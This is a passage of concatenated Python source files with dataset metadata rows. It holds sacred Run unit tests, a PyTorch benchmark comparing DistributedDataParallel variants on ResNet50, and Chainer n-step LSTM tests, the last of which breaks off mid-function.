run.capture_mode = "fd"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
def test_captured_out_filter(run, capsys):
def print_mock_progress():
sys.stdout.write('progress 0')
sys.stdout.flush()
for i in range(10):
sys.stdout.write('\b')
sys.stdout.write(str(i))
sys.stdout.flush()
run.captured_out_filter = apply_backspaces_and_linefeeds
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
sys.stdout.flush()
assert run.captured_out == 'progress 9'
| 29.861314 | 97 | 0.712173 |
from __future__ import division, print_function, unicode_literals
from datetime import datetime
import mock
import os
import pytest
import tempfile
import sys
from sacred.run import Run
from sacred.config.config_summary import ConfigSummary
from sacred.utils import (ObserverError, SacredInterrupt, TimeoutInterrupt,
apply_backspaces_and_linefeeds)
@pytest.fixture
def run():
config = {'a': 17, 'foo': {'bar': True, 'baz': False}, 'seed': 1234}
config_mod = ConfigSummary()
signature = mock.Mock()
signature.name = 'main_func'
main_func = mock.Mock(return_value=123, prefix='', signature=signature)
logger = mock.Mock()
observer = [mock.Mock(priority=10)]
return Run(config, config_mod, main_func, observer, logger, logger, {},
{}, [], [])
def test_run_attributes(run):
assert isinstance(run.config, dict)
assert isinstance(run.config_modifications, ConfigSummary)
assert isinstance(run.experiment_info, dict)
assert isinstance(run.host_info, dict)
assert isinstance(run.info, dict)
def test_run_state_attributes(run):
assert run.start_time is None
assert run.stop_time is None
assert run.captured_out == ''
assert run.result is None
def test_run_run(run):
assert run() == 123
assert (run.start_time - datetime.utcnow()).total_seconds() < 1
assert (run.stop_time - datetime.utcnow()).total_seconds() < 1
assert run.result == 123
assert run.captured_out == ''
def test_run_emits_events_if_successful(run):
run()
observer = run.observers[0]
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
@pytest.mark.parametrize('exception,status', [
(KeyboardInterrupt, 'INTERRUPTED'),
(SacredInterrupt, 'INTERRUPTED'),
(TimeoutInterrupt, 'TIMEOUT'),
])
def test_run_emits_events_if_interrupted(run, exception, status):
observer = run.observers[0]
run.main_function.side_effect = exception
with pytest.raises(exception):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert observer.interrupted_event.called
observer.interrupted_event.assert_called_with(
interrupt_time=run.stop_time,
status=status)
assert not observer.failed_event.called
def test_run_emits_events_if_failed(run):
observer = run.observers[0]
run.main_function.side_effect = TypeError
with pytest.raises(TypeError):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert observer.failed_event.called
def test_run_started_event(run):
observer = run.observers[0]
run()
observer.started_event.assert_called_with(
command='main_func',
ex_info=run.experiment_info,
host_info=run.host_info,
start_time=run.start_time,
config=run.config,
meta_info={},
_id=None
)
def test_run_completed_event(run):
observer = run.observers[0]
run()
observer.completed_event.assert_called_with(
stop_time=run.stop_time,
result=run.result
)
def test_run_heartbeat_event(run):
observer = run.observers[0]
run.info['test'] = 321
run()
call_args, call_kwargs = observer.heartbeat_event.call_args_list[0]
assert call_kwargs['info'] == run.info
assert call_kwargs['captured_out'] == ""
assert (call_kwargs['beat_time'] - datetime.utcnow()).total_seconds() < 1
def test_run_artifact_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
metadata = {'testkey': 42}
run.add_artifact(f_name, name='foobar', metadata=metadata)
observer.artifact_event.assert_called_with(filename=f_name, name='foobar', metadata=metadata)
os.close(handle)
os.remove(f_name)
def test_run_resource_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
run.open_resource(f_name)
observer.resource_event.assert_called_with(filename=f_name)
os.close(handle)
os.remove(f_name)
def test_run_cannot_be_started_twice(run):
run()
with pytest.raises(RuntimeError):
run()
def test_run_observer_failure_on_startup_not_caught(run):
observer = run.observers[0]
observer.started_event.side_effect = ObserverError
with pytest.raises(ObserverError):
run()
def test_run_observer_error_in_heartbeat_is_caught(run):
observer = run.observers[0]
observer.heartbeat_event.side_effect = TypeError
run()
assert observer in run._failed_observers
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
def test_run_exception_in_completed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.completed_event.side_effect = TypeError
run()
assert observer.completed_event.called
assert observer2.completed_event.called
def test_run_exception_in_interrupted_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.interrupted_event.side_effect = TypeError
run.main_function.side_effect = KeyboardInterrupt
with pytest.raises(KeyboardInterrupt):
run()
assert observer.interrupted_event.called
assert observer2.interrupted_event.called
def test_run_exception_in_failed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.failed_event.side_effect = TypeError
run.main_function.side_effect = AttributeError
with pytest.raises(AttributeError):
run()
assert observer.failed_event.called
assert observer2.failed_event.called
def test_unobserved_run_doesnt_emit(run):
observer = run.observers[0]
run.unobserved = True
run()
assert not observer.started_event.called
assert not observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
def test_stdout_capturing_no(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "no"
with capsys.disabled():
run()
assert run.captured_out == ''
def test_stdout_capturing_sys(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
@pytest.mark.skip('Breaks randomly on test server')
def test_stdout_capturing_fd(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "fd"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
def test_captured_out_filter(run, capsys):
def print_mock_progress():
sys.stdout.write('progress 0')
sys.stdout.flush()
for i in range(10):
sys.stdout.write('\b')
sys.stdout.write(str(i))
sys.stdout.flush()
run.captured_out_filter = apply_backspaces_and_linefeeds
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
sys.stdout.flush()
assert run.captured_out == 'progress 9'
| true | true |
f73269981546a570cb9a309603dd8f27856144f3 | 9,873 | py | Python | benchmarks/distributed/ddp/compare/compare_ddp.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | benchmarks/distributed/ddp/compare/compare_ddp.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | benchmarks/distributed/ddp/compare/compare_ddp.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | """
A simple tool to compare the performance of different impls of
DistributedDataParallel on resnet50, three flavors:
1. DistributedDataParallel, which has a python wrapper and C++ core to do
gradient distribution and reduction. It's current production version.
2. PythonDDP with async gradient reduction.
3. PythonDDP with synchrous gradient reduction.
Example::
>>> modify configs in main func
>>> python compare_ddp.py
>>> Sample out: compare_ddp_sample.md
"""
import numpy as np
import os
import pickle
import glob
import python_ddp
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
from collections import OrderedDict
from enum import Enum
from tabulate import tabulate
from torch.nn.parallel import DistributedDataParallel as DDP
class DDPOption(Enum):
DDP_CPP_CORE = 1
PYTHON_DDP_SYNC_REDUCTION = 2
PYTHON_DDP_ASYNC_REDUCTION = 3
class LatencyData:
__slots__ = ["buffer_size_in_M", "ddp_option", "rank", "metrics"]
def __init__(self, buffer_size_in_M, ddp_option, rank, metrics):
self.buffer_size_in_M = buffer_size_in_M
self.ddp_option = ddp_option
self.rank = rank
self.metrics = metrics
def serialize(buffer_size_in_M, ddp_option, rank, metrics,
data_dir="./tmp", ext="ddpraw"):
if not os.path.exists(data_dir):
print(f'{data_dir} not exist, mkdir {data_dir}')
os.mkdir(data_dir)
file_name = "buffer_size_{}M_rank{}_{}.{}".format(
buffer_size_in_M, rank, ddp_option, ext)
file_path = os.path.join(data_dir, file_name)
print("Writing metrics to file: '{}'".format(file_path))
data = LatencyData(buffer_size_in_M, ddp_option, rank, metrics)
with open(file_path, "wb") as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
print(f"Wrote metrics to '{file_path}''")
def load_detailed_metrics(data_dir="./tmp", ext="ddpraw"):
assert os.path.exists(data_dir)
file_pattern = os.path.join(data_dir, f"*.{ext}")
files = glob.glob(file_pattern)
print("load_detailed_metrics found {} files".format(len(files)))
buffer_size_to_metrics = OrderedDict()
for file_path in files:
with open(file_path, "rb") as f:
data = pickle.load(f)
# Add data to buffer_size_to_metrics
buffer_size = data.buffer_size_in_M
if buffer_size not in buffer_size_to_metrics:
buffer_size_to_metrics[buffer_size] = {}
metrics = buffer_size_to_metrics.get(buffer_size)
assert metrics is not None
metrics[data.ddp_option] = data.metrics
return buffer_size_to_metrics
def setup(rank, world_size):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '12355'
# initialize the process group
dist.init_process_group("gloo", rank=rank, world_size=world_size)
def create_ddp_model(module, rank, pg, ddp_option, buffer_size_in_M):
"""Helper to create DDPModel. """
if ddp_option == DDPOption.DDP_CPP_CORE:
ddp_model = DDP(module, device_ids=[rank],
process_group=pg,
bucket_cap_mb=buffer_size_in_M)
ddp_model._set_static_graph()
return ddp_model
elif ddp_option == DDPOption.PYTHON_DDP_SYNC_REDUCTION:
M = 2 ** 20
return python_ddp.PythonDDP(module, pg, False, buffer_size=buffer_size_in_M * M)
elif ddp_option == DDPOption.PYTHON_DDP_ASYNC_REDUCTION:
M = 2 ** 20
return python_ddp.PythonDDP(module, pg, True, buffer_size=buffer_size_in_M * M)
else:
raise NotImplementedError
def run_ddp(rank, world_size, epochs, ddp_option, buffer_size_in_M, warmup_iterations=20):
print(f'Invoked run_ddp rank {rank}')
assert epochs > warmup_iterations
# Setup
print("setting up ... ")
setup(rank, world_size)
torch.manual_seed(rank)
torch.cuda.manual_seed(rank)
device = torch.device('cuda:%d' % rank)
print('setup done')
# Create ResNet50 module and wrap in DDP module.
pg = dist.distributed_c10d._get_default_group()
model = models.resnet50().to(device)
ddp_model = create_ddp_model(model, rank, pg, ddp_option, buffer_size_in_M)
assert ddp_model is not None
loss_fn = nn.MSELoss()
optimizer = optim.SGD(ddp_model.parameters(), lr=0.001)
# Container to hold: event -> list of events in milliseconds
MODEL_FORWARD = "forward"
MODEL_BACKWARD = "backward"
metrics = {MODEL_FORWARD: [], MODEL_BACKWARD: []}
for epoch in range(epochs):
if epoch % 10 == 0:
print(f'Epoch {epoch}/{epochs} ...')
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
# TODO(bowangbj): Switch to real training set from ImageNet.
inputs = torch.rand([32, 3, 224, 224], device=device)
labels = torch.rand([32, 1000], device=device)
# Forward
start.record()
outputs = ddp_model(inputs)
loss = loss_fn(outputs, labels)
end.record()
torch.cuda.synchronize()
if epoch >= warmup_iterations:
metrics[MODEL_FORWARD].append(start.elapsed_time(end))
# Backward
start.record()
loss.backward()
# Reduce all grad, this is needed for non-DDP_CPP_CORE since the hook
# for all_reduce does not exist yet.
if ddp_option != DDPOption.DDP_CPP_CORE:
ddp_model.all_reduce_grads()
end.record()
torch.cuda.synchronize()
if epoch >= warmup_iterations:
metrics[MODEL_BACKWARD].append(start.elapsed_time(end))
# Optimization
optimizer.step()
optimizer.zero_grad()
if rank == 0:
print(f"\nMetrics for GPU {rank}, ddp_option={ddp_option}, buffer_size={buffer_size_in_M}M")
print(f"Skipped {warmup_iterations} CUDA warmpup iterations. ")
for step, elapsed_milliseconds in metrics.items():
A = np.array(elapsed_milliseconds)
print(' {N} iterations, {step}, mean={mean} ms, median={median} ms, p90={p90} ms, p99={p99} ms'.format(
N=len(A), step=step, mean=np.mean(A),
median=np.percentile(A, 50), p90=np.percentile(A, 90),
p99=np.percentile(A, 99)))
# Serialize the raw data to be used to compute summary. Didn't choose to
# maintain a global object holding the metrics b/c mp.spawn tries to
# fork all the arguments before spawning new process thus it's infeasible
# save global states in an object.
serialize(buffer_size_in_M, ddp_option, rank, metrics)
def append_delta(row_list, base, exp):
percent = 100 * ((exp - base) / base)
row_list.append(percent)
def print_summary(buffer_size_to_metrics):
# metrics: {ddp_option, Metrics}
# Metrics: step -> [latency]
for buffer_size, metrics in buffer_size_to_metrics.items():
assert DDPOption.DDP_CPP_CORE in metrics.keys()
baseline = metrics.get(DDPOption.DDP_CPP_CORE)
print(f"=== Summary for buffer_size: {buffer_size}M === ")
for step in baseline.keys():
# step takes value from [forward, backward]
# compute latency for each step into a table, each row is looks like
# [option, mean, diff, mean, diff, p90, diff, p95, diff, p99, diff]
data = []
baseline_latencies = baseline.get(step)
assert baseline_latencies is not None
A_baseline = np.array(baseline_latencies)
for ddp_option, exp_metrics in metrics.items():
exp_latencies = exp_metrics.get(step)
assert exp_latencies is not None
A_exp = np.array(exp_latencies)
# Yield option, mean, p50, p90, p95, p99 and delta.
row = [ddp_option]
row.append(np.mean(A_exp))
append_delta(row, np.mean(A_baseline), np.mean(A_exp))
for px in [50, 90, 95, 99]:
base = np.percentile(A_baseline, px)
exp = np.percentile(A_exp, px)
row.append(exp)
append_delta(row, base, exp)
data.append(row)
# Output buffer_size, step as a table.
print(tabulate(data,
headers=[f"DDP: [{step}]", "Mean", "delta%",
"mean", "delta%", "p90", "delta%",
"p95", "delta%%", "p99", "delta%"]))
print("\n")
def main():
world_size = 2
epochs = 120
# resnet50 model facts:
# total_param_count = 161
# total_elements = 25557032 ~= 24.37M
# param_max_elements = 2359296 ~= 2.25M
# Try different bucket sizes.
buffer_size_in_mbs = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27]
print("buffer_size_in_mbs: " + str(buffer_size_in_mbs))
for buffer_size_in_M in buffer_size_in_mbs:
print("\n\n=== NEW EXPERIMENT: buffer_size={}M, {} epochs, world_size={} ===".format(
buffer_size_in_M, epochs, world_size))
options = [
DDPOption.DDP_CPP_CORE,
DDPOption.PYTHON_DDP_ASYNC_REDUCTION,
DDPOption.PYTHON_DDP_SYNC_REDUCTION
]
for option in options:
print("Measuring option: {} ... ".format(option))
mp.spawn(run_ddp,
args=(world_size, epochs, option, buffer_size_in_M),
nprocs=world_size,
join=True)
print("\n Generating summaries ... ")
buffer_size_to_metrics = load_detailed_metrics(data_dir="./tmp", ext="ddpraw")
print_summary(buffer_size_to_metrics)
if __name__ == "__main__" :
main()
| 38.416342 | 118 | 0.637395 |
import numpy as np
import os
import pickle
import glob
import python_ddp
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
from collections import OrderedDict
from enum import Enum
from tabulate import tabulate
from torch.nn.parallel import DistributedDataParallel as DDP
class DDPOption(Enum):
DDP_CPP_CORE = 1
PYTHON_DDP_SYNC_REDUCTION = 2
PYTHON_DDP_ASYNC_REDUCTION = 3
class LatencyData:
__slots__ = ["buffer_size_in_M", "ddp_option", "rank", "metrics"]
def __init__(self, buffer_size_in_M, ddp_option, rank, metrics):
self.buffer_size_in_M = buffer_size_in_M
self.ddp_option = ddp_option
self.rank = rank
self.metrics = metrics
def serialize(buffer_size_in_M, ddp_option, rank, metrics,
data_dir="./tmp", ext="ddpraw"):
if not os.path.exists(data_dir):
print(f'{data_dir} not exist, mkdir {data_dir}')
os.mkdir(data_dir)
file_name = "buffer_size_{}M_rank{}_{}.{}".format(
buffer_size_in_M, rank, ddp_option, ext)
file_path = os.path.join(data_dir, file_name)
print("Writing metrics to file: '{}'".format(file_path))
data = LatencyData(buffer_size_in_M, ddp_option, rank, metrics)
with open(file_path, "wb") as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
print(f"Wrote metrics to '{file_path}''")
def load_detailed_metrics(data_dir="./tmp", ext="ddpraw"):
assert os.path.exists(data_dir)
file_pattern = os.path.join(data_dir, f"*.{ext}")
files = glob.glob(file_pattern)
print("load_detailed_metrics found {} files".format(len(files)))
buffer_size_to_metrics = OrderedDict()
for file_path in files:
with open(file_path, "rb") as f:
data = pickle.load(f)
# Add data to buffer_size_to_metrics
buffer_size = data.buffer_size_in_M
if buffer_size not in buffer_size_to_metrics:
buffer_size_to_metrics[buffer_size] = {}
metrics = buffer_size_to_metrics.get(buffer_size)
assert metrics is not None
metrics[data.ddp_option] = data.metrics
return buffer_size_to_metrics
def setup(rank, world_size):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '12355'
# initialize the process group
dist.init_process_group("gloo", rank=rank, world_size=world_size)
def create_ddp_model(module, rank, pg, ddp_option, buffer_size_in_M):
if ddp_option == DDPOption.DDP_CPP_CORE:
ddp_model = DDP(module, device_ids=[rank],
process_group=pg,
bucket_cap_mb=buffer_size_in_M)
ddp_model._set_static_graph()
return ddp_model
elif ddp_option == DDPOption.PYTHON_DDP_SYNC_REDUCTION:
M = 2 ** 20
return python_ddp.PythonDDP(module, pg, False, buffer_size=buffer_size_in_M * M)
elif ddp_option == DDPOption.PYTHON_DDP_ASYNC_REDUCTION:
M = 2 ** 20
return python_ddp.PythonDDP(module, pg, True, buffer_size=buffer_size_in_M * M)
else:
raise NotImplementedError
def run_ddp(rank, world_size, epochs, ddp_option, buffer_size_in_M, warmup_iterations=20):
print(f'Invoked run_ddp rank {rank}')
assert epochs > warmup_iterations
# Setup
print("setting up ... ")
setup(rank, world_size)
torch.manual_seed(rank)
torch.cuda.manual_seed(rank)
device = torch.device('cuda:%d' % rank)
print('setup done')
# Create ResNet50 module and wrap in DDP module.
pg = dist.distributed_c10d._get_default_group()
model = models.resnet50().to(device)
ddp_model = create_ddp_model(model, rank, pg, ddp_option, buffer_size_in_M)
assert ddp_model is not None
loss_fn = nn.MSELoss()
optimizer = optim.SGD(ddp_model.parameters(), lr=0.001)
# Container to hold: event -> list of events in milliseconds
MODEL_FORWARD = "forward"
MODEL_BACKWARD = "backward"
metrics = {MODEL_FORWARD: [], MODEL_BACKWARD: []}
for epoch in range(epochs):
if epoch % 10 == 0:
print(f'Epoch {epoch}/{epochs} ...')
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
# TODO(bowangbj): Switch to real training set from ImageNet.
inputs = torch.rand([32, 3, 224, 224], device=device)
labels = torch.rand([32, 1000], device=device)
# Forward
start.record()
outputs = ddp_model(inputs)
loss = loss_fn(outputs, labels)
end.record()
torch.cuda.synchronize()
if epoch >= warmup_iterations:
metrics[MODEL_FORWARD].append(start.elapsed_time(end))
# Backward
start.record()
loss.backward()
# Reduce all grad, this is needed for non-DDP_CPP_CORE since the hook
# for all_reduce does not exist yet.
if ddp_option != DDPOption.DDP_CPP_CORE:
ddp_model.all_reduce_grads()
end.record()
torch.cuda.synchronize()
if epoch >= warmup_iterations:
metrics[MODEL_BACKWARD].append(start.elapsed_time(end))
# Optimization
optimizer.step()
optimizer.zero_grad()
if rank == 0:
print(f"\nMetrics for GPU {rank}, ddp_option={ddp_option}, buffer_size={buffer_size_in_M}M")
print(f"Skipped {warmup_iterations} CUDA warmpup iterations. ")
for step, elapsed_milliseconds in metrics.items():
A = np.array(elapsed_milliseconds)
print(' {N} iterations, {step}, mean={mean} ms, median={median} ms, p90={p90} ms, p99={p99} ms'.format(
N=len(A), step=step, mean=np.mean(A),
median=np.percentile(A, 50), p90=np.percentile(A, 90),
p99=np.percentile(A, 99)))
# Serialize the raw data to be used to compute summary. Didn't choose to
# save global states in an object.
serialize(buffer_size_in_M, ddp_option, rank, metrics)
def append_delta(row_list, base, exp):
percent = 100 * ((exp - base) / base)
row_list.append(percent)
def print_summary(buffer_size_to_metrics):
# metrics: {ddp_option, Metrics}
# Metrics: step -> [latency]
for buffer_size, metrics in buffer_size_to_metrics.items():
assert DDPOption.DDP_CPP_CORE in metrics.keys()
baseline = metrics.get(DDPOption.DDP_CPP_CORE)
print(f"=== Summary for buffer_size: {buffer_size}M === ")
for step in baseline.keys():
# step takes value from [forward, backward]
# compute latency for each step into a table, each row is looks like
# [option, mean, diff, mean, diff, p90, diff, p95, diff, p99, diff]
data = []
baseline_latencies = baseline.get(step)
assert baseline_latencies is not None
A_baseline = np.array(baseline_latencies)
for ddp_option, exp_metrics in metrics.items():
exp_latencies = exp_metrics.get(step)
assert exp_latencies is not None
A_exp = np.array(exp_latencies)
# Yield option, mean, p50, p90, p95, p99 and delta.
row = [ddp_option]
row.append(np.mean(A_exp))
append_delta(row, np.mean(A_baseline), np.mean(A_exp))
for px in [50, 90, 95, 99]:
base = np.percentile(A_baseline, px)
exp = np.percentile(A_exp, px)
row.append(exp)
append_delta(row, base, exp)
data.append(row)
# Output buffer_size, step as a table.
print(tabulate(data,
headers=[f"DDP: [{step}]", "Mean", "delta%",
"mean", "delta%", "p90", "delta%",
"p95", "delta%%", "p99", "delta%"]))
print("\n")
def main():
world_size = 2
epochs = 120
# resnet50 model facts:
# total_param_count = 161
# total_elements = 25557032 ~= 24.37M
# param_max_elements = 2359296 ~= 2.25M
# Try different bucket sizes.
buffer_size_in_mbs = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27]
print("buffer_size_in_mbs: " + str(buffer_size_in_mbs))
for buffer_size_in_M in buffer_size_in_mbs:
print("\n\n=== NEW EXPERIMENT: buffer_size={}M, {} epochs, world_size={} ===".format(
buffer_size_in_M, epochs, world_size))
options = [
DDPOption.DDP_CPP_CORE,
DDPOption.PYTHON_DDP_ASYNC_REDUCTION,
DDPOption.PYTHON_DDP_SYNC_REDUCTION
]
for option in options:
print("Measuring option: {} ... ".format(option))
mp.spawn(run_ddp,
args=(world_size, epochs, option, buffer_size_in_M),
nprocs=world_size,
join=True)
print("\n Generating summaries ... ")
buffer_size_to_metrics = load_detailed_metrics(data_dir="./tmp", ext="ddpraw")
print_summary(buffer_size_to_metrics)
if __name__ == "__main__" :
main()
| true | true |
f7326999dc24482830c16aa9561534ecbfcf6ab2 | 9,195 | py | Python | tests/chainer_tests/functions_tests/connection_tests/test_n_step_lstm.py | mingxiaoh/chainer-v3 | 815ff00f5eaf7944d6e8a75662ff64a2fe046a4d | [
"BSD-3-Clause"
] | 7 | 2017-05-08T07:02:40.000Z | 2018-12-02T18:35:39.000Z | tests/chainer_tests/functions_tests/connection_tests/test_n_step_lstm.py | mingxiaoh/chainer-v3 | 815ff00f5eaf7944d6e8a75662ff64a2fe046a4d | [
"BSD-3-Clause"
] | null | null | null | tests/chainer_tests/functions_tests/connection_tests/test_n_step_lstm.py | mingxiaoh/chainer-v3 | 815ff00f5eaf7944d6e8a75662ff64a2fe046a4d | [
"BSD-3-Clause"
] | null | null | null | import unittest
import mock
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
def sigmoid(x):
return numpy.tanh(x * 0.5) * 0.5 + 0.5
def _split(inputs, pos):
return inputs[:pos], inputs[pos:]
@testing.parameterize(*testing.product({
'use_cudnn': [True, False],
}))
class TestNStepLSTM(unittest.TestCase):
batches = [3, 2, 1]
length = len(batches)
in_size = 3
out_size = 2
n_layers = 2
dropout = 0.0
def setUp(self):
self.xs = [numpy.random.uniform(-1, 1, (b, self.in_size)).astype('f')
for b in self.batches]
h_shape = (self.n_layers, self.batches[0], self.out_size)
self.cx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.hx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.ws = []
self.bs = []
for i in range(self.n_layers):
weights = []
biases = []
for j in range(8):
if i == 0 and j < 4:
w_in = self.in_size
else:
w_in = self.out_size
weights.append(numpy.random.uniform(
-1, 1, (self.out_size, w_in)).astype('f'))
biases.append(numpy.random.uniform(
-1, 1, (self.out_size,)).astype('f'))
self.ws.append(weights)
self.bs.append(biases)
self.dys = [numpy.random.uniform(-1, 1, (b, self.out_size)).astype('f')
for b in self.batches]
self.dcy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.dhy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
def check_forward(
self, h_data, c_data, xs_data, ws_data, bs_data, volatile):
h = chainer.Variable(h_data, volatile=volatile)
c = chainer.Variable(c_data, volatile=volatile)
xs = [chainer.Variable(x, volatile=volatile) for x in xs_data]
ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
for ws in ws_data]
bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
for bs in bs_data]
hy, cy, ys = functions.n_step_lstm(
self.n_layers, self.dropout, h, c, ws, bs, xs,
use_cudnn=self.use_cudnn)
e_hy = self.hx.copy()
e_cy = self.cx.copy()
for ind in range(self.length):
x = self.xs[ind]
batch = x.shape[0]
for layer in range(self.n_layers):
w = self.ws[layer]
b = self.bs[layer]
h_prev = e_hy[layer, :batch]
c_prev = e_cy[layer, :batch]
i = sigmoid(x.dot(w[0].T) + h_prev.dot(w[4].T) + b[0] + b[4])
f = sigmoid(x.dot(w[1].T) + h_prev.dot(w[5].T) + b[1] + b[5])
c_bar = numpy.tanh(
x.dot(w[2].T) + h_prev.dot(w[6].T) + b[2] + b[6])
o = sigmoid(x.dot(w[3].T) + h_prev.dot(w[7].T) + b[3] + b[7])
e_c = (f * c_prev + i * c_bar)
e_h = o * numpy.tanh(e_c)
e_hy[layer, :batch] = e_h
e_cy[layer, :batch] = e_c
x = e_h
testing.assert_allclose(
ys[ind].data, x, rtol=1e-4, atol=1e-4)
testing.assert_allclose(hy.data, e_hy, rtol=1e-4, atol=1e-4)
testing.assert_allclose(cy.data, e_cy, rtol=1e-4, atol=1e-4)
def test_forward_cpu(self):
self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, False)
def test_forward_cpu_volatile(self):
self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, True)
@attr.gpu
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
False)
@attr.gpu
def test_forward_gpu_volatile(self):
self.check_forward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
True)
def check_backward(self, h_data, c_data, xs_data, ws_data, bs_data,
dhy_data, dcy_data, dys_data):
args = tuple([h_data, c_data] + sum(ws_data, []) + sum(bs_data, []) +
xs_data)
grads = tuple([dhy_data, dcy_data] + dys_data)
def f(*inputs):
(hx, cx), inputs = _split(inputs, 2)
ws = []
for i in range(self.n_layers):
weights, inputs = _split(inputs, 8)
ws.append(weights)
bs = []
for i in range(self.n_layers):
biases, inputs = _split(inputs, 8)
bs.append(biases)
xs = inputs
hy, cy, ys = functions.n_step_lstm(
self.n_layers, self.dropout, hx, cx, ws, bs, xs)
return (hy, cy) + ys
gradient_check.check_backward(
f, args, grads, eps=1e-2, rtol=1e-3, atol=1e-3)
def test_backward_cpu(self):
self.check_backward(self.hx, self.cx, self.xs, self.ws, self.bs,
self.dhy, self.dcy, self.dys)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
cuda.to_gpu(self.dhy),
cuda.to_gpu(self.dcy),
[cuda.to_gpu(dy) for dy in self.dys])
@testing.parameterize(*testing.product({
'use_cudnn': [True, False],
}))
@attr.cudnn
class TestNStepLSTMCudnnCall(unittest.TestCase):
batches = [4, 3, 2, 1]
length = len(batches)
in_size = 3
out_size = 4
n_layers = 2
dropout = 0.0
def setUp(self):
self.xs = [cuda.cupy.random.uniform(
-1, 1, (b, self.in_size)).astype('f')
for b in self.batches]
h_shape = (self.n_layers, self.batches[0], self.out_size)
self.cx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.hx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.ws = []
self.bs = []
for i in range(self.n_layers):
weights = []
biases = []
for j in range(8):
if i == 0 and j < 4:
w_in = self.in_size
else:
w_in = self.out_size
weights.append(cuda.cupy.random.uniform(
-1, 1, (self.out_size, w_in)).astype('f'))
biases.append(cuda.cupy.random.uniform(
-1, 1, (self.out_size,)).astype('f'))
self.ws.append(weights)
self.bs.append(biases)
self.dys = [cuda.cupy.random.uniform(
-1, 1, (b, self.out_size)).astype('f')
for b in self.batches]
self.dcy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.dhy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.expect = self.use_cudnn and (
cuda.cudnn.cudnn.getVersion() >= 5000)
def forward(self, train):
volatile = not train
h = chainer.Variable(self.hx, volatile=volatile)
c = chainer.Variable(self.cx, volatile=volatile)
xs = [chainer.Variable(x, volatile=volatile) for x in self.xs]
